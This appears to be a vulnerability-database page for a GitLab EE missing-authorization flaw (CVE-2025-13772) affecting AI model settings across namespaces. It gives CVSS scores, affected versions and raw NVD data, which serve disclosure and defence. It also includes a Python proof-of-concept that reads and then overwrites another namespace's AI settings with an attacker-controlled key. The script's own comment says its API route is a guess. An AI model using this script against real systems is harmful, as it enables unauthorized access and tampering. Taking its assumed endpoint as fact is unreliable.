Security Vulnerability Report
CVE-2025-13772 CVSS 7.1 HIGH


Published: 2026-01-09 10:15:45
Last Modified: 2026-01-22 17:25:25

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Weakness
CWE-862 (Missing Authorization)

Note: the raw record at the bottom of this page carries two CVSS 3.1 assessments. The 7.1 HIGH score above is the Secondary assessment, which rates confidentiality impact as High. The Primary assessment (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) scores 4.3 MEDIUM with confidentiality impact None. Both agree on network-reachable, low-complexity exploitation by an authenticated low-privilege user with no user interaction; they differ only on how much the exposed AI model settings disclose.

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.4.0 up to, but excluding, 18.5.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.6.0 up to, but excluding, 18.6.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:* - VULNERABLE
All GitLab EE versions from 18.4 before 18.5.5
All GitLab EE versions from 18.6 before 18.6.3
All GitLab EE versions from 18.7 before 18.7.1
Fixed in: GitLab EE 18.5.5, 18.6.3 and 18.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-13772 PoC - GitLab EE AI Model Settings Unauthorized Access
# Target: GitLab EE versions 18.4 to 18.5.5, 18.6 to 18.6.3, 18.7 to 18.7.1
# NOTE: the API route used below is this PoC's own assumption; the advisory
# text on this page does not name the affected endpoint.

TARGET_GITLAB = "https://victim-gitlab.example.com"
ATTACKER_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx"  # Low-privilege user token
TARGET_NAMESPACE_ID = "victim-namespace-id"    # Unauthorized namespace ID


def exploit_ai_model_settings():
    headers = {
        "PRIVATE-TOKEN": ATTACKER_TOKEN,
        "Content-Type": "application/json",
    }

    # Step 1: List AI model settings from unauthorized namespace
    endpoint = f"{TARGET_GITLAB}/api/v4/namespaces/{TARGET_NAMESPACE_ID}/ai/settings"

    try:
        response = requests.get(endpoint, headers=headers, timeout=10)

        if response.status_code == 200:
            print("[+] Successfully accessed AI model settings from unauthorized namespace")
            print(f"[+] Response: {json.dumps(response.json(), indent=2)}")

            # Step 2: Attempt to modify AI model settings
            modify_endpoint = f"{TARGET_GITLAB}/api/v4/namespaces/{TARGET_NAMESPACE_ID}/ai/settings"
            modify_data = {
                "model_provider": "custom",
                "api_key": "attacker-controlled-key",
            }
            mod_response = requests.put(modify_endpoint, headers=headers, json=modify_data, timeout=10)

            if mod_response.status_code in [200, 204]:
                print("[+] Successfully modified AI model settings")
            else:
                print(f"[-] Modification rejected: {mod_response.status_code}")
        elif response.status_code == 403:
            print("[-] Access denied - vulnerability may be patched")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    exploit_ai_model_settings()

References

https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/581268 (tagged Broken Link in the NVD record)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13772", "sourceIdentifier": "[email protected]", "published": "2026-01-09T10:15:45.450", "lastModified": "2026-01-22T17:25:24.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab EE que afectaba a todas las versiones desde la 18.4 antes de la 18.5.5, la 18.6 antes de la 18.6.3 y la 18.7 antes de la 18.7.1 que podría haber permitido a un usuario autenticado acceder y utilizar la configuración del modelo de IA desde espacios de nombres no autorizados manipulando identificadores de espacios de nombres en solicitudes de API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", 
"description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.5.5", "matchCriteriaId": "285DA1C9-F1D1-49F5-9C2A-41E6798DFD44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.3", "matchCriteriaId": "75013646-70F2-467E-B79E-9301338AB853"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "9B955F55-086B-4EDF-A9E6-5B9E68600494"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/581268", "source": "[email protected]", "tags": ["Broken Link"]}]}}